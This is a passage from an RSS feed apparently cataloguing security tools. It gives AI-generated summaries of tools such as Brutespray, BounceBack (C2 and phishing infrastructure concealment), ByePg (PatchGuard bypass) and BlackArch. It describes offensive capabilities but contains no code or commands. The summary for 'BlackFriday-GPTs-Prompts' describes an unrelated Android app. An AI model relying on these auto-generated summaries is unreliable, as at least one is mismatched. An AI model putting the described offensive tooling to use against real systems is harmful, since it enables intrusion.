 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-logo-dark.png#gh-dark-mode-only" width="300"&gt;&lt;/a&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-logo-light.png#gh-light-mode-only" width="300"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-text-dark.png#gh-dark-mode-only" width="170"&gt;&lt;/a&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-text-light.png#gh-light-mode-only" width="170"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;em&gt;"Swiss army knife for reverse engineers."&lt;/em&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/orhun/binsider/releases"&gt;
 &lt;img src="https://img.shields.io/github/v/release/orhun/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=f8be75&amp;logo=GitHub&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://crates.io/crates/binsider/"&gt;
 &lt;img src="https://img.shields.io/crates/v/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=f8be75&amp;logo=Rust&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/orhun/binsider/actions?query=workflow%3A%22CI%22"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/ci.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=GitHub%20Actions&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/orhun/binsider/actions?query=workflow%3A%22CD%22"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/cd.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=GitHub%20Actions&amp;logoColor=white&amp;label=deploy"&gt;&lt;/a&gt;
 &lt;a href="https://hub.docker.com/r/orhunp/binsider"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/docker.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;label=docker&amp;logo=Docker&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://docs.rs/binsider/"&gt;
 &lt;img src="https://img.shields.io/docsrs/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=Rust&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="https://discord.gg/zphNxEcEK7"&gt;
 &lt;img src="https://img.shields.io/discord/1289166752311148554?color=f8be75&amp;label=discord&amp;labelColor=1d1d1d&amp;logo=discord&amp;logoColor=white"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h4 align="center"&gt;
 &lt;a href="https://binsider.dev/getting-started/"&gt;Documentation&lt;/a&gt; |
 &lt;a href="https://binsider.dev/"&gt;Website&lt;/a&gt;
&lt;/h4&gt;
&lt;p&gt;😼🕵️‍♂️ &lt;strong&gt;Binsider&lt;/strong&gt; can perform static and dynamic analysis, inspect strings, examine linked libraries, and perform hexdumps, all within a user-friendly terminal user interface!&lt;/p&gt;</description></item><item><title>biodiff</title><link>https://rainmana.github.io/hackyfeed/tools/8051enthusiast-biodiff/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/8051enthusiast-biodiff/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; biodiff is a binary file comparison tool that employs bioinformatics algorithms to align and display two binary files side by side, allowing users to identify similarities and differences in byte sequences. Its notable features include customizable byte representations, multiple viewing modes (aligned and unaligned), and advanced search capabilities using text and regex, which facilitate detailed analysis of binary data. Additionally, users can perform both block-level and global alignments, making it suitable for examining varying sizes of binary files efficiently.&lt;/p&gt;</description></item><item><title>black-hat-rust</title><link>https://rainmana.github.io/hackyfeed/tools/skerkour-black-hat-rust/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skerkour-black-hat-rust/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Black Hat Rust is a specialized resource for understanding and implementing offensive security techniques using the Rust programming language. It covers a broad spectrum of offensive security concepts, including building custom tools for cyber attacks, phishing, and exploitation, while emphasizing practical application and real-world Rust programming practices. Notable features include multi-threaded attack surface discovery and async operations, making it suitable for both developers looking to enhance their security skills and security engineers aiming to leverage Rust for offensive purposes.&lt;/p&gt;</description></item><item><title>blackarch</title><link>https://rainmana.github.io/hackyfeed/tools/blackarch-blackarch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blackarch-blackarch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BlackArch Linux is a penetration testing distribution based on Arch Linux, providing a repository of over 2,800 security tools organized by category. It offers flexible installation options, compatibility with existing Arch setups, and features a Live ISO for immediate testing. The toolset is aimed at penetration testers and security researchers for tasks such as forensics, reverse engineering, and network analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="table-of-contents"&gt;Table of Contents&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#description"&gt;Description&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#overview"&gt;Overview&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#download-and-installation"&gt;Download and Installation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#key-features"&gt;Key Features&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#installation-instruction"&gt;Installation Instruction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#usage"&gt;Usage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#get-involved"&gt;Get Involved&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributing"&gt;Contributing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#license"&gt;License&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disclaimer"&gt;Disclaimer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#conclusion"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h1 id="description"&gt;Description&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;BlackArch Linux&lt;/strong&gt; is an Arch Linux–based penetration testing distribution for
penetration testers and security researchers. The repository contains &lt;a href="https://www.blackarch.org/tools.html"&gt;2850
tools&lt;/a&gt;. You can install tools individually
or in groups. BlackArch Linux is compatible with existing Arch installations.
For more information, see the installation instructions.&lt;/p&gt;</description></item><item><title>blackbird</title><link>https://rainmana.github.io/hackyfeed/tools/p1ngul1n0-blackbird/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p1ngul1n0-blackbird/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Blackbird is an OSINT tool designed for rapid username and email searches across over 600 platforms, integrating AI-powered profiling for enhanced data analysis. Notable features include community-driven accuracy, smart filters, automated analysis, and the ability to export results as PDF or CSV files. It leverages tools like WhatsMyName to provide low false positive rates while ensuring user privacy during its operations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="blackbird"&gt;Blackbird&lt;/h1&gt;
&lt;figure&gt;&lt;img src="./docs/.gitbook/assets/ai-demo.png" alt=""&gt;&lt;figcaption&gt;&lt;/figcaption&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;Blackbird is a powerful OSINT tool that combines fast username and email searches across more than 600 platforms with free AI-powered profiling. By leveraging community-driven projects like WhatsMyName, it ensures low false positive rates and high-quality results. Features include smart filters, polished PDF/CSV exports, and fully automated analysis — all from a single CLI.
&lt;br&gt;&lt;/p&gt;</description></item><item><title>BlackFriday-GPTs-Prompts</title><link>https://rainmana.github.io/hackyfeed/tools/friuns2-blackfriday-gpts-prompts/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/friuns2-blackfriday-gpts-prompts/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AnyClaw is an Android application that integrates OpenClaw and Codex, enabling two AI coding agents to perform tasks without requiring root access or Termux. Its primary use case is to facilitate coding assistance and prompt generation across various domains, including programming and marketing. Notable features include a user-friendly interface and the ability to handle multiple types of prompts, making it versatile for different user needs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;h3 id="anyclaw--openclaw--codex-running-natively-on-android"&gt;&lt;a href="https://github.com/friuns2/openclaw-android-assistant"&gt;AnyClaw&lt;/a&gt; — OpenClaw + Codex running natively on Android&lt;/h3&gt;
&lt;p&gt;Two AI coding agents in one APK. No root. No Termux.&lt;/p&gt;</description></item><item><title>BlackWidow</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-blackwidow/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-blackwidow/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BlackWidow is a Python-based web application spider designed for gathering critical information from target websites, including subdomains, URLs, dynamic parameters, email addresses, and phone numbers. It features an integrated fuzzer, Inject-X, which scans dynamic URLs for common OWASP vulnerabilities, and automatically saves collected data into organized text files. Notable functionalities include deep crawling with customizable levels, verbose logging, and support for fuzzing unique parameters for enhanced security testing.&lt;/p&gt;</description></item><item><title>BLUESPAWN</title><link>https://rainmana.github.io/hackyfeed/tools/ion28-bluespawn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ion28-bluespawn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BLUESPAWN is an active defense and endpoint detection and response tool designed for blue teams to monitor systems in real-time and identify malicious activities within a network. Its notable features include the ability to detect, identify, and eliminate malware, as well as its open-source nature, fostering community collaboration for continuous improvement. The tool emphasizes rapid detection and understanding of the Windows attack surface against advanced threats, while providing visibility into its detection capabilities aligned with the MITRE ATT&amp;amp;CK framework.&lt;/p&gt;</description></item><item><title>BlueTeam-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/a-poc-blueteam-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/a-poc-blueteam-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BlueTeam-Tools is a comprehensive repository comprising over 65 tools and resources tailored for blue teaming activities, encompassing tasks such as network discovery, vulnerability management, and security monitoring. Notable features include a variety of specialized scanners like Nmap and OpenVAS, as well as systems for data visualization and malicious traffic detection, aimed at enhancing defensive cybersecurity measures. This collection serves as an essential toolkit for security professionals focusing on threat detection and incident response.&lt;/p&gt;</description></item><item><title>bluing</title><link>https://rainmana.github.io/hackyfeed/tools/fo-000-bluing/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fo-000-bluing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bluing is a specialized intelligence gathering tool designed to exploit vulnerabilities in Bluetooth protocols, facilitating various hacking techniques on Bluetooth devices. It provides essential features such as device address cleaning, hardware compatibility checks, and command options for managing Bluetooth connections, including Basic Rate and Low Energy systems. The tool is primarily intended for use on Linux operating systems, leveraging dependencies like BlueZ and requires Python 3.10 for installation.&lt;/p&gt;</description></item><item><title>bopscrk</title><link>https://rainmana.github.io/hackyfeed/tools/r3nt0n-bopscrk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r3nt0n-bopscrk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; bopscrk is a targeted wordlist generator designed for crafting customized password lists based on personal information related to a specific target. Its notable features include the ability to combine various word combinations, perform customizable case and leet transformations, and leverage lyrics from artists for enhanced wordlist creation, all accessible through an interactive mode or a command-line interface. The tool is included in the BlackArch Linux penetration testing distribution and is built with Python 3.&lt;/p&gt;</description></item><item><title>botw</title><link>https://rainmana.github.io/hackyfeed/tools/zeldaret-botw/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zeldaret-botw/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The zeldaret/botw repository is an experimental work-in-progress decompilation of &lt;em&gt;The Legend of Zelda: Breath of the Wild&lt;/em&gt; version 1.5.0 for the Nintendo Switch. Its primary use case is to facilitate the understanding of the game&amp;rsquo;s internal mechanics, support glitch hunting efforts, and provide comprehensive documentation for future reverse engineering initiatives. Notable features include ongoing progress tracking and community collaboration through Discord for contributors.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="the-legend-of-zelda-breath-of-the-wild"&gt;The Legend of Zelda: Breath of the Wild&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://botw.link/progress"&gt;&lt;img src="https://img.shields.io/endpoint?url=https://botw.link/badges/progress.json" alt="Decompilation Progress"&gt;&lt;/a&gt; &lt;a href="https://botw.link/progress"&gt;&lt;img src="https://img.shields.io/endpoint?url=https://botw.link/badges/fn_progress.json" alt="Decompilation Progress (functions)"&gt;&lt;/a&gt; &lt;a href="https://github.com/zeldaret/botw/graphs/contributors"&gt;&lt;img src="https://img.shields.io/github/contributors/zeldaret/botw" alt="Contributors"&gt;&lt;/a&gt; &lt;a href="https://discord.zelda.deco.mp"&gt;&lt;img src="https://img.shields.io/discord/688807550715560050?color=%237289DA&amp;amp;logo=discord&amp;amp;logoColor=%23FFFFFF" alt="Discord Channel"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>BounceBack</title><link>https://rainmana.github.io/hackyfeed/tools/d00movenok-bounceback/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/d00movenok-bounceback/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BounceBack is a versatile reverse proxy tool designed to enhance the security of red team operations by obfuscating the command-and-control (C2) or phishing infrastructure from detection by blue teams and security tools. It features a highly customizable filtering system that leverages real-time traffic analysis, extensive blacklists, and support for multiple protocols, enabling precise control over which traffic is allowed or denied. Notable capabilities include malleable C2 profile parsing, comprehensive IP address validation, domain fronting, and a robust logging mechanism for monitoring incoming requests and potential security threats.&lt;/p&gt;</description></item><item><title>brakeman</title><link>https://rainmana.github.io/hackyfeed/tools/presidentbeef-brakeman/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/presidentbeef-brakeman/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Brakeman is a static analysis tool designed to identify security vulnerabilities in Ruby on Rails applications. It supports a wide range of output formats, includes features for ignoring specific checks, and allows for comparing current scans with previous results. Built to be compatible with various Rails versions, it can be run locally or via Docker, providing extensive configuration options for detailed security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://brakemanscanner.org/"&gt;&lt;img src="http://brakemanscanner.org/images/logo_medium.png" alt="Brakeman Logo"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://circleci.com/gh/presidentbeef/brakeman"&gt;&lt;img src="https://circleci.com/gh/presidentbeef/brakeman.svg?style=svg" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://qlty.sh/gh/presidentbeef/projects/brakeman"&gt;&lt;img src="https://qlty.sh/gh/presidentbeef/projects/brakeman/coverage.svg" alt="Code Coverage"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>breaking-and-pwning-apps-and-servers-aws-azure-training</title><link>https://rainmana.github.io/hackyfeed/tools/appsecco-breaking-and-pwning-apps-and-servers-aws-azure-training/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/appsecco-breaking-and-pwning-apps-and-servers-aws-azure-training/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Breaking and Pwning Apps and Servers on AWS and Azure&amp;rdquo; repository provides comprehensive, hands-on training for security testers and DevSecOps professionals focusing on vulnerability assessment and penetration testing within cloud environments. It includes structured documentation, setup files for creating student virtual machines, and additional resources to facilitate practical lab experiences in identifying and exploiting security weaknesses in AWS and Azure platforms. The training emphasizes real-world attack scenarios and techniques, making it a valuable resource for professionals aiming to bolster their cloud security expertise.&lt;/p&gt;</description></item><item><title>brutespray</title><link>https://rainmana.github.io/hackyfeed/tools/x90skysn3k-brutespray/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/x90skysn3k-brutespray/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Brutespray is a credential brute-forcing tool designed to automatically test default credentials against discovered services from various scan outputs, including Nmap and Nessus. It supports over 30 protocols and features capabilities such as multi-auth support, password spray mode, an interactive terminal UI, and resume functionality, allowing for efficient and comprehensive credential testing across networks. The tool is built in Go and offers extensive customization options through YAML configuration files and embedded wordlists.&lt;/p&gt;</description></item><item><title>Bug_Bounty_writeups</title><link>https://rainmana.github.io/hackyfeed/tools/alexbieber-bug_bounty_writeups/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alexbieber-bug_bounty_writeups/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Bug Bounty Writeups repository serves as a comprehensive collection of write-ups documenting various types of security vulnerabilities encountered during bug bounty hunts, such as XSS, CSRF, and SQL injection. Its primary use case is to provide guidance and examples for ethical hackers and security researchers looking to enhance their skills and avoid common pitfalls in vulnerability disclosure. Notable features include a structured organization of write-ups by vulnerability type and the use of Bash for automation in certain contexts.&lt;/p&gt;</description></item><item><title>Bug-Bounty-Methodology</title><link>https://rainmana.github.io/hackyfeed/tools/tuhin1729-bug-bounty-methodology/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tuhin1729-bug-bounty-methodology/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bug-Bounty-Methodology is a collection of checklists designed for systematic bug bounty hunting. It covers various security testing scenarios, including 2FA testing, CAPTCHA bypass, CSRF protection, and OAuth misconfiguration, providing comprehensive guidelines for identifying vulnerabilities in web applications. Notable features include a structured compilation of methodologies tailored for different attack vectors and documentation that serves as a practical resource for penetration testers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="bug-bounty-methodology"&gt;Bug-Bounty-Methodology&lt;/h1&gt;
&lt;p&gt;These are my checklists which I use during my bug bounty hunting.&lt;/p&gt;</description></item><item><title>bundler-audit</title><link>https://rainmana.github.io/hackyfeed/tools/rubysec-bundler-audit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rubysec-bundler-audit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bundler-audit is a vulnerability checker for Ruby applications that audits a project&amp;rsquo;s Gemfile.lock for insecure gem versions and insecure sources. It features the ability to ignore certain advisories, provides detailed advisory information, and does not require an active network connection to perform audits. Ideal for integrating into CI workflows, it enables developers to ensure their applications are secure by identifying and suggesting updates for vulnerable gems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="bundler-audit"&gt;bundler-audit&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/rubysec/bundler-audit/actions/workflows/ruby.yml"&gt;&lt;img src="https://github.com/rubysec/bundler-audit/actions/workflows/ruby.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
&lt;a href="https://codeclimate.com/github/rubysec/bundler-audit"&gt;&lt;img src="https://codeclimate.com/github/rubysec/bundler-audit.svg" alt="Code Climate"&gt;&lt;/a&gt;
&lt;a href="https://badge.fury.io/rb/bundler-audit"&gt;&lt;img src="https://badge.fury.io/rb/bundler-audit.svg" alt="Gem Version"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>burp-ai-agent</title><link>https://rainmana.github.io/hackyfeed/tools/six2dez-burp-ai-agent/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/six2dez-burp-ai-agent/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Burp AI Agent is an extension for Burp Suite that enhances security testing workflows by integrating AI capabilities. It supports multiple AI backends, allowing users to run both passive and active vulnerability scans across a wide array of vulnerability classes, while featuring options for privacy settings and audit logging for compliance. Additionally, it can connect to external AI agents via the MCP, enabling autonomous operation and enriching the security analysis process.&lt;/p&gt;</description></item><item><title>Burp-Suite-Certified-Practitioner-Exam-Study</title><link>https://rainmana.github.io/hackyfeed/tools/botesjuan-burp-suite-certified-practitioner-exam-study/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/botesjuan-burp-suite-certified-practitioner-exam-study/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Burp Suite Certified Practitioner Exam Study repository contains comprehensive study notes and practical labs designed to aid candidates in preparing for the Burp Suite Certified Practitioner (BSCP) Exam. It includes over 110 labs covering essential topics such as scanning, footholds, privilege escalation, and data exfiltration, alongside practical techniques and scripts tailored for effective web application security testing. Notable features include a structured approach to vulnerability assessment and recommendations for additional training materials and resources to enhance exam readiness.&lt;/p&gt;</description></item><item><title>BurpBounty</title><link>https://rainmana.github.io/hackyfeed/tools/wagiro-burpbounty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wagiro-burpbounty/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Burp Bounty is a Burp Suite extension designed to enhance both active and passive scanning capabilities by allowing users to create personalized scanning rules through an intuitive graphical interface. The tool offers advanced pattern search and payload improvement features to build custom issue profiles, catering to automated and manual penetration testing workflows. A notable aspect is the availability of profiles shared by the community, which further augments its functionality.&lt;/p&gt;</description></item><item><title>BurpCrypto</title><link>https://rainmana.github.io/hackyfeed/tools/whwlsfb-burpcrypto/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/whwlsfb-burpcrypto/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BurpCrypto is a collection of encryption plugins for Burp Suite, supporting multiple encryption algorithms including AES, RSA, and DES, as well as the execution of JavaScript code for encryption tasks. Its primary use case is to enhance the capabilities of security professionals by allowing them to integrate cryptographic functions directly into their testing workflows. Notable features include a user-friendly interface for key management and seamless integration with Burp Suite&amp;rsquo;s payload processing system.&lt;/p&gt;</description></item><item><title>burpgpt</title><link>https://rainmana.github.io/hackyfeed/tools/aress31-burpgpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aress31-burpgpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BurpGPT is an advanced security extension that integrates with Burp Suite to analyze web traffic using AI-driven techniques, specifically utilizing OpenAI&amp;rsquo;s models to uncover security vulnerabilities that conventional scanners may overlook. Its notable features include customizable prompts for tailored analysis, automated report generation summarizing potential security issues, and granular control over the analysis parameters. This tool streamlines the vulnerability assessment process, improving the efficiency and accuracy of security professionals while handling the complexities of web application security.&lt;/p&gt;</description></item><item><title>BurpSuite-collections</title><link>https://rainmana.github.io/hackyfeed/tools/mr-xn-burpsuite-collections/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mr-xn-burpsuite-collections/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BurpSuite-collections is a repository containing various non-BApp Store plugins for Burp Suite, aimed at enhancing penetration testing capabilities. Notable features include SQL injection detection, automated SSRF vulnerability scanning, and the ability to manage variables within Burp, allowing security professionals to effectively discover and exploit vulnerabilities. The project serves primarily as a resource for learning and research related to Burp Suite plugins.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="burp-suite-collections"&gt;Burp-Suite-collections&lt;/h1&gt;
&lt;h4 id="burpsuite-相关收集项目插件主要是非bapp-store商店"&gt;BurpSuite 相关收集项目，插件主要是非BApp Store（商店）&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;所有的汉化或者使用burpsuite都是在你配置好了Java环境的前提下！！！&lt;a href="./books/%E5%A6%82%E4%BD%95%E5%9C%A864%E4%BD%8DWindows%2010%E4%B8%8B%E5%AE%89%E8%A3%85java%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83.pdf"&gt;相关教程&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;最新版（202212之后）&lt;del&gt;激活参考这个&lt;a href="https://github.com/h3110w0r1d-y/BurpLoaderKeygen"&gt;项目&lt;/a&gt; 自己解决，本项目不提供&lt;/del&gt;&lt;/p&gt;</description></item><item><title>buster</title><link>https://rainmana.github.io/hackyfeed/tools/sham00n-buster/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sham00n-buster/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Buster is a comprehensive Open Source Intelligence (OSINT) tool designed for email reconnaissance, capable of gathering social account links, breaches, and associated domains for a given email address. Notable features include the ability to generate potential emails and usernames, verify existing emails, and query various online sources and databases for comprehensive results. The tool is particularly useful for security researchers and investigators needing to gather detailed information on individuals or validate email addresses.&lt;/p&gt;</description></item><item><title>ByePg</title><link>https://rainmana.github.io/hackyfeed/tools/can1357-byepg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/can1357-byepg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ByePg is a kernel-level tool that circumvents Windows PatchGuard and HVCI by leveraging an early-bugcheck hook through the hijacking of the HalPrivateDispatchTable. Its primary use case is to facilitate the implementation of exception-based hooks, allowing for the registration of high-level system-wide exception handlers and offering capabilities for kernel manipulation previously restricted by PatchGuard. Notably, the tool includes a base library and various examples that demonstrate syscall hooking and SEH handling, showcasing its potential for creating new attack surfaces.&lt;/p&gt;</description></item><item><title>bypass-firewalls-by-DNS-history</title><link>https://rainmana.github.io/hackyfeed/tools/vincentcox-bypass-firewalls-by-dns-history/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vincentcox-bypass-firewalls-by-dns-history/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Bypass firewalls by abusing DNS history&amp;rdquo; tool automates the process of discovering direct IP addresses of servers behind web application firewalls (WAFs) by leveraging historical DNS records. Its primary use case is for security professionals, including bug bounty hunters, aiming to uncover misconfigured servers or outdated versions of websites that may be vulnerable to exploits. Notable features include the ability to output confidence levels based on HTML response similarities and support for fetching IPs of subdomains to enhance bypass attempts.&lt;/p&gt;</description></item><item><title>C2-Tracker</title><link>https://rainmana.github.io/hackyfeed/tools/montysecurity-c2-tracker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/montysecurity-c2-tracker/</guid><description>&lt;blockquote&gt;
